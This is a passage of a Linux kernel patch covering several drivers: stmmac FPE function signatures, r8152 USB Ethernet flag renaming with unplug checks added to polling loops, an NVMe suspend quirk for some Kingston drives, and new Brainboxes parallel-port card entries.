+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.h
+@@ -153,9 +153,11 @@ int dwmac5_est_configure(void __iomem *ioaddr, struct stmmac_est *cfg,
+ 			 unsigned int ptp_rate);
+ void dwmac5_est_irq_status(void __iomem *ioaddr, struct net_device *dev,
+ 			   struct stmmac_extra_stats *x, u32 txqcnt);
+-void dwmac5_fpe_configure(void __iomem *ioaddr, u32 num_txq, u32 num_rxq,
++void dwmac5_fpe_configure(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			  u32 num_txq, u32 num_rxq,
+ 			  bool enable);
+ void dwmac5_fpe_send_mpacket(void __iomem *ioaddr,
++			     struct stmmac_fpe_cfg *cfg,
+ 			     enum stmmac_mpacket_type type);
+ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev);
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index f30e08a106cbe..c2181c277291b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -1441,7 +1441,8 @@ static int dwxgmac3_est_configure(void __iomem *ioaddr, struct stmmac_est *cfg,
+ 	return 0;
+ }
+ 
+-static void dwxgmac3_fpe_configure(void __iomem *ioaddr, u32 num_txq,
++static void dwxgmac3_fpe_configure(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++				   u32 num_txq,
+ 				   u32 num_rxq, bool enable)
+ {
+ 	u32 value;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/hwif.h b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+index 592b4067f9b8f..b2b9cf04bc726 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/hwif.h
++++ b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+@@ -392,9 +392,11 @@ struct stmmac_ops {
+ 			     unsigned int ptp_rate);
+ 	void (*est_irq_status)(void __iomem *ioaddr, struct net_device *dev,
+ 			       struct stmmac_extra_stats *x, u32 txqcnt);
+-	void (*fpe_configure)(void __iomem *ioaddr, u32 num_txq, u32 num_rxq,
++	void (*fpe_configure)(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			      u32 num_txq, u32 num_rxq,
+ 			      bool enable);
+ 	void (*fpe_send_mpacket)(void __iomem *ioaddr,
++				 struct stmmac_fpe_cfg *cfg,
+ 				 enum stmmac_mpacket_type type);
+ 	int (*fpe_irq_status)(void __iomem *ioaddr, struct net_device *dev);
+ };
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 9f76c2f7d513b..69aac8ed84f67 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -957,7 +957,8 @@ static void stmmac_fpe_link_state_handle(struct stmmac_priv *priv, bool is_up)
+ 	bool *hs_enable = &fpe_cfg->hs_enable;
+ 
+ 	if (is_up && *hs_enable) {
+-		stmmac_fpe_send_mpacket(priv, priv->ioaddr, MPACKET_VERIFY);
++		stmmac_fpe_send_mpacket(priv, priv->ioaddr, fpe_cfg,
++					MPACKET_VERIFY);
+ 	} else {
+ 		*lo_state = FPE_STATE_OFF;
+ 		*lp_state = FPE_STATE_OFF;
+@@ -5704,6 +5705,7 @@ static void stmmac_fpe_event_status(struct stmmac_priv *priv, int status)
+ 		/* If user has requested FPE enable, quickly response */
+ 		if (*hs_enable)
+ 			stmmac_fpe_send_mpacket(priv, priv->ioaddr,
++						fpe_cfg,
+ 						MPACKET_RESPONSE);
+ 	}
+ 
+@@ -7028,6 +7030,7 @@ static void stmmac_fpe_lp_task(struct work_struct *work)
+ 		if (*lo_state == FPE_STATE_ENTERING_ON &&
+ 		    *lp_state == FPE_STATE_ENTERING_ON) {
+ 			stmmac_fpe_configure(priv, priv->ioaddr,
++					     fpe_cfg,
+ 					     priv->plat->tx_queues_to_use,
+ 					     priv->plat->rx_queues_to_use,
+ 					     *enable);
+@@ -7046,6 +7049,7 @@ static void stmmac_fpe_lp_task(struct work_struct *work)
+ 			netdev_info(priv->dev, SEND_VERIFY_MPAKCET_FMT,
+ 				    *lo_state, *lp_state);
+ 			stmmac_fpe_send_mpacket(priv, priv->ioaddr,
++						fpe_cfg,
+ 						MPACKET_VERIFY);
+ 		}
+ 		/* Sleep then retry */
+@@ -7060,6 +7064,7 @@ void stmmac_fpe_handshake(struct stmmac_priv *priv, bool enable)
+ 	if (priv->plat->fpe_cfg->hs_enable != enable) {
+ 		if (enable) {
+ 			stmmac_fpe_send_mpacket(priv, priv->ioaddr,
++						priv->plat->fpe_cfg,
+ 						MPACKET_VERIFY);
+ 		} else {
+ 			priv->plat->fpe_cfg->lo_fpe_state = FPE_STATE_OFF;
+@@ -7472,6 +7477,7 @@ int stmmac_suspend(struct device *dev)
+ 	if (priv->dma_cap.fpesel) {
+ 		/* Disable FPE */
+ 		stmmac_fpe_configure(priv, priv->ioaddr,
++				     priv->plat->fpe_cfg,
+ 				     priv->plat->tx_queues_to_use,
+ 				     priv->plat->rx_queues_to_use, false);
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+index 773e415cc2de6..390c900832cd2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+@@ -1073,6 +1073,7 @@ disable:
+ 
+ 	priv->plat->fpe_cfg->enable = false;
+ 	stmmac_fpe_configure(priv, priv->ioaddr,
++			     priv->plat->fpe_cfg,
+ 			     priv->plat->tx_queues_to_use,
+ 			     priv->plat->rx_queues_to_use,
+ 			     false);
+diff --git a/drivers/net/hyperv/Kconfig b/drivers/net/hyperv/Kconfig
+index ca7bf7f897d36..c8cbd85adcf99 100644
+--- a/drivers/net/hyperv/Kconfig
++++ b/drivers/net/hyperv/Kconfig
+@@ -3,5 +3,6 @@ config HYPERV_NET
+ 	tristate "Microsoft Hyper-V virtual network driver"
+ 	depends on HYPERV
+ 	select UCS2_STRING
++	select NLS
+ 	help
+ 	  Select this option to enable the Hyper-V virtual network driver.
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 345e341d22338..4d833781294a4 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -763,7 +763,7 @@ enum rtl_register_content {
+ 
+ /* rtl8152 flags */
+ enum rtl8152_flags {
+-	RTL8152_UNPLUG = 0,
++	RTL8152_INACCESSIBLE = 0,
+ 	RTL8152_SET_RX_MODE,
+ 	WORK_ENABLE,
+ 	RTL8152_LINK_CHG,
+@@ -1244,7 +1244,7 @@ int set_registers(struct r8152 *tp, u16 value, u16 index, u16 size, void *data)
+ static void rtl_set_unplug(struct r8152 *tp)
+ {
+ 	if (tp->udev->state == USB_STATE_NOTATTACHED) {
+-		set_bit(RTL8152_UNPLUG, &tp->flags);
++		set_bit(RTL8152_INACCESSIBLE, &tp->flags);
+ 		smp_mb__after_atomic();
+ 	}
+ }
+@@ -1255,7 +1255,7 @@ static int generic_ocp_read(struct r8152 *tp, u16 index, u16 size,
+ 	u16 limit = 64;
+ 	int ret = 0;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	/* both size and indix must be 4 bytes align */
+@@ -1299,7 +1299,7 @@ static int generic_ocp_write(struct r8152 *tp, u16 index, u16 byteen,
+ 	u16 byteen_start, byteen_end, byen;
+ 	u16 limit = 512;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	/* both size and indix must be 4 bytes align */
+@@ -1529,7 +1529,7 @@ static int read_mii_word(struct net_device *netdev, int phy_id, int reg)
+ 	struct r8152 *tp = netdev_priv(netdev);
+ 	int ret;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	if (phy_id != R8152_PHY_ID)
+@@ -1545,7 +1545,7 @@ void write_mii_word(struct net_device *netdev, int phy_id, int reg, int val)
+ {
+ 	struct r8152 *tp = netdev_priv(netdev);
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (phy_id != R8152_PHY_ID)
+@@ -1750,7 +1750,7 @@ static void read_bulk_callback(struct urb *urb)
+ 	if (!tp)
+ 		return;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+@@ -1842,7 +1842,7 @@ static void write_bulk_callback(struct urb *urb)
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+ 		return;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (!skb_queue_empty(&tp->tx_queue))
+@@ -1863,7 +1863,7 @@ static void intr_callback(struct urb *urb)
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+ 		return;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	switch (status) {
+@@ -2607,7 +2607,7 @@ static void bottom_half(struct tasklet_struct *t)
+ {
+ 	struct r8152 *tp = from_tasklet(tp, t, tx_tl);
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+@@ -2650,7 +2650,7 @@ int r8152_submit_rx(struct r8152 *tp, struct rx_agg *agg, gfp_t mem_flags)
+ 	int ret;
+ 
+ 	/* The rx would be stopped, so skip submitting */
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags) ||
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags) ||
+ 	    !test_bit(WORK_ENABLE, &tp->flags) || !netif_carrier_ok(tp->netdev))
+ 		return 0;
+ 
+@@ -2857,6 +2857,8 @@ static void rtl8152_nic_reset(struct r8152 *tp)
+ 		ocp_write_byte(tp, MCU_TYPE_PLA, PLA_CR, CR_RST);
+ 
+ 		for (i = 0; i < 1000; i++) {
++			if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++				break;
+ 			if (!(ocp_read_byte(tp, MCU_TYPE_PLA, PLA_CR) & CR_RST))
+ 				break;
+ 			usleep_range(100, 400);
+@@ -3050,7 +3052,7 @@ static int rtl_enable(struct r8152 *tp)
+ 
+ static int rtl8152_enable(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	set_tx_qlen(tp);
+@@ -3137,7 +3139,7 @@ static int rtl8153_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	set_tx_qlen(tp);
+@@ -3169,7 +3171,7 @@ static void rtl_disable(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -3186,6 +3188,8 @@ static void rtl_disable(struct r8152 *tp)
+ 	rxdy_gated_en(tp, true);
+ 
+ 	for (i = 0; i < 1000; i++) {
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			break;
+ 		ocp_data = ocp_read_byte(tp, MCU_TYPE_PLA, PLA_OOB_CTRL);
+ 		if ((ocp_data & FIFO_EMPTY) == FIFO_EMPTY)
+ 			break;
+@@ -3193,6 +3197,8 @@ static void rtl_disable(struct r8152 *tp)
+ 	}
+ 
+ 	for (i = 0; i < 1000; i++) {
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			break;
+ 		if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_TCR0) & TCR0_TX_EMPTY)
+ 			break;
+ 		usleep_range(1000, 2000);
+@@ -3623,7 +3629,7 @@ static u16 r8153_phy_status(struct r8152 *tp, u16 desired)
+ 		}
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			break;
+ 	}
+ 
+@@ -3655,7 +3661,7 @@ static void r8153b_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
+-				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++				if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+@@ -3697,7 +3703,7 @@ static void r8153c_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
+-				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++				if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+@@ -4062,8 +4068,8 @@ static int rtl_phy_patch_request(struct r8152 *tp, bool request, bool wait)
+ 	for (i = 0; wait && i < 5000; i++) {
+ 		u32 ocp_data;
+ 
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
+-			break;
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			return -ENODEV;
+ 
+ 		usleep_range(1000, 2000);
+ 		ocp_data = ocp_reg_read(tp, OCP_PHY_PATCH_STAT);
+@@ -5381,6 +5387,8 @@ static void wait_oob_link_list_ready(struct r8152 *tp)
+ 	int i;
+ 
+ 	for (i = 0; i < 1000; i++) {
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			break;
+ 		ocp_data = ocp_read_byte(tp, MCU_TYPE_PLA, PLA_OOB_CTRL);
+ 		if (ocp_data & LINK_LIST_READY)
+ 			break;
+@@ -5395,6 +5403,8 @@ static void r8156b_wait_loading_flash(struct r8152 *tp)
+ 		int i;
+ 
+ 		for (i = 0; i < 100; i++) {
++			if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++				break;
+ 			if (ocp_read_word(tp, MCU_TYPE_USB, USB_GPHY_CTRL) & GPHY_PATCH_DONE)
+ 				break;
+ 			usleep_range(1000, 2000);
+@@ -5517,6 +5527,8 @@ static int r8153_pre_firmware_1(struct r8152 *tp)
+ 	for (i = 0; i < 104; i++) {
+ 		u32 ocp_data = ocp_read_byte(tp, MCU_TYPE_USB, USB_WDT1_CTRL);
+ 
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			return -ENODEV;
+ 		if (!(ocp_data & WTD1_EN))
+ 			break;
+ 		usleep_range(1000, 2000);
+@@ -5673,6 +5685,8 @@ static void r8153_aldps_en(struct r8152 *tp, bool enable)
+ 		data &= ~EN_ALDPS;
+ 		ocp_reg_write(tp, OCP_POWER_CFG, data);
+ 		for (i = 0; i < 20; i++) {
++			if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++				return;
+ 			usleep_range(1000, 2000);
+ 			if (ocp_read_word(tp, MCU_TYPE_PLA, 0xe000) & 0x0100)
+ 				break;
+@@ -6026,7 +6040,7 @@ static int rtl8156_enable(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	u16 speed;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	r8156_fc_parameter(tp);
+@@ -6084,7 +6098,7 @@ static int rtl8156b_enable(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	u16 speed;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	set_tx_qlen(tp);
+@@ -6270,7 +6284,7 @@ out:
+ 
+ static void rtl8152_up(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8152_aldps_en(tp, false);
+@@ -6280,7 +6294,7 @@ static void rtl8152_up(struct r8152 *tp)
+ 
+ static void rtl8152_down(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6295,7 +6309,7 @@ static void rtl8153_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153_u1u2en(tp, false);
+@@ -6335,7 +6349,7 @@ static void rtl8153_down(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6356,7 +6370,7 @@ static void rtl8153b_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -6380,7 +6394,7 @@ static void rtl8153b_down(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6417,7 +6431,7 @@ static void rtl8153c_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -6498,7 +6512,7 @@ static void rtl8156_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -6571,7 +6585,7 @@ static void rtl8156_down(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6709,7 +6723,7 @@ static void rtl_work_func_t(struct work_struct *work)
+ 	/* If the device is unplugged or !netif_running(), the workqueue
+ 	 * doesn't need to wake the device, and could return directly.
+ 	 */
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags) || !netif_running(tp->netdev))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags) || !netif_running(tp->netdev))
+ 		return;
+ 
+ 	if (usb_autopm_get_interface(tp->intf) < 0)
+@@ -6748,7 +6762,7 @@ static void rtl_hw_phy_work_func_t(struct work_struct *work)
+ {
+ 	struct r8152 *tp = container_of(work, struct r8152, hw_phy_work.work);
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (usb_autopm_get_interface(tp->intf) < 0)
+@@ -6875,7 +6889,7 @@ static int rtl8152_close(struct net_device *netdev)
+ 	netif_stop_queue(netdev);
+ 
+ 	res = usb_autopm_get_interface(tp->intf);
+-	if (res < 0 || test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (res < 0 || test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		rtl_stop_rx(tp);
+ 	} else {
+@@ -6908,7 +6922,7 @@ static void r8152b_init(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	u16 data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	data = r8152_mdio_read(tp, MII_BMCR);
+@@ -6952,7 +6966,7 @@ static void r8153_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153_u1u2en(tp, false);
+@@ -6963,7 +6977,7 @@ static void r8153_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			break;
+ 	}
+ 
+@@ -7092,7 +7106,7 @@ static void r8153b_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -7103,7 +7117,7 @@ static void r8153b_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			break;
+ 	}
+ 
+@@ -7174,7 +7188,7 @@ static void r8153c_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -7194,7 +7208,7 @@ static void r8153c_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			return;
+ 	}
+ 
+@@ -8023,7 +8037,7 @@ static void r8156_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	ocp_data = ocp_read_byte(tp, MCU_TYPE_USB, USB_ECM_OP);
+@@ -8044,7 +8058,7 @@ static void r8156_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			return;
+ 	}
+ 
+@@ -8119,7 +8133,7 @@ static void r8156b_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	ocp_data = ocp_read_byte(tp, MCU_TYPE_USB, USB_ECM_OP);
+@@ -8153,7 +8167,7 @@ static void r8156b_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			return;
+ 	}
+ 
+@@ -9219,7 +9233,7 @@ static int rtl8152_ioctl(struct net_device *netdev, struct ifreq *rq, int cmd)
+ 	struct mii_ioctl_data *data = if_mii(rq);
+ 	int res;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	res = usb_autopm_get_interface(tp->intf);
+@@ -9321,7 +9335,7 @@ static const struct net_device_ops rtl8152_netdev_ops = {
+ 
+ static void rtl8152_unload(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (tp->version != RTL_VER_01)
+@@ -9330,7 +9344,7 @@ static void rtl8152_unload(struct r8152 *tp)
+ 
+ static void rtl8153_unload(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153_power_cut_en(tp, false);
+@@ -9338,7 +9352,7 @@ static void rtl8153_unload(struct r8152 *tp)
+ 
+ static void rtl8153b_unload(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_power_cut_en(tp, false);
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 69f9e69208f68..118bf08a708b9 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -154,6 +154,11 @@ enum nvme_quirks {
+ 	 * No temperature thresholds for channels other than 0 (Composite).
+ 	 */
+ 	NVME_QUIRK_NO_SECONDARY_TEMP_THRESH	= (1 << 19),
++
++	/*
++	 * Disables simple suspend/resume path.
++	 */
++	NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND	= (1 << 20),
+ };
+ 
+ /*
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 886c3fc9578e4..3d01290994d89 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3093,6 +3093,18 @@ static unsigned long check_vendor_combination_bug(struct pci_dev *pdev)
+ 		if ((dmi_match(DMI_BOARD_VENDOR, "LENOVO")) &&
+ 		     dmi_match(DMI_BOARD_NAME, "LNVNB161216"))
+ 			return NVME_QUIRK_SIMPLE_SUSPEND;
++	} else if (pdev->vendor == 0x2646 && (pdev->device == 0x2263 ||
++		   pdev->device == 0x500f)) {
++		/*
++		 * Exclude some Kingston NV1 and A2000 devices from
++		 * NVME_QUIRK_SIMPLE_SUSPEND. Do a full suspend to save a
++		 * lot fo energy with s2idle sleep on some TUXEDO platforms.
++		 */
++		if (dmi_match(DMI_BOARD_NAME, "NS5X_NS7XAU") ||
++		    dmi_match(DMI_BOARD_NAME, "NS5x_7xAU") ||
++		    dmi_match(DMI_BOARD_NAME, "NS5x_7xPU") ||
++		    dmi_match(DMI_BOARD_NAME, "PH4PRX1_PH6PRX1"))
++			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
+ 	}
+ 
+ 	return 0;
+@@ -3133,7 +3145,9 @@ static struct nvme_dev *nvme_pci_alloc_dev(struct pci_dev *pdev,
+ 	dev->dev = get_device(&pdev->dev);
+ 
+ 	quirks |= check_vendor_combination_bug(pdev);
+-	if (!noacpi && acpi_storage_d3(&pdev->dev)) {
++	if (!noacpi &&
++	    !(quirks & NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND) &&
++	    acpi_storage_d3(&pdev->dev)) {
+ 		/*
+ 		 * Some systems use a bios work around to ask for D3 on
+ 		 * platforms that support kernel managed suspend.
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 0fbf331a748fd..9bb9fe0fad07c 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -104,8 +104,9 @@ int of_reconfig_notify(unsigned long action, struct of_reconfig_data *p)
+  *
+  * Returns the new state of a device based on the notifier used.
+  *
+- * Return: 0 on device going from enabled to disabled, 1 on device
+- * going from disabled to enabled and -1 on no change.
++ * Return: OF_RECONFIG_CHANGE_REMOVE on device going from enabled to
++ * disabled, OF_RECONFIG_CHANGE_ADD on device going from disabled to
++ * enabled and OF_RECONFIG_NO_CHANGE on no change.
+  */
+ int of_reconfig_get_state_change(unsigned long action, struct of_reconfig_data *pr)
+ {
+diff --git a/drivers/parport/parport_pc.c b/drivers/parport/parport_pc.c
+index 5784dc20fb382..4605758d32146 100644
+--- a/drivers/parport/parport_pc.c
++++ b/drivers/parport/parport_pc.c
+@@ -2614,6 +2614,8 @@ enum parport_pc_pci_cards {
+ 	netmos_9865,
+ 	quatech_sppxp100,
+ 	wch_ch382l,
++	brainboxes_uc146,
++	brainboxes_px203,
+ };
+ 
+ 
+@@ -2678,6 +2680,8 @@ static struct parport_pc_pci {
+ 	/* netmos_9865 */               { 1, { { 0, -1 }, } },
+ 	/* quatech_sppxp100 */		{ 1, { { 0, 1 }, } },
+ 	/* wch_ch382l */		{ 1, { { 2, -1 }, } },
++	/* brainboxes_uc146 */	{ 1, { { 3, -1 }, } },
++	/* brainboxes_px203 */	{ 1, { { 0, -1 }, } },
+ };
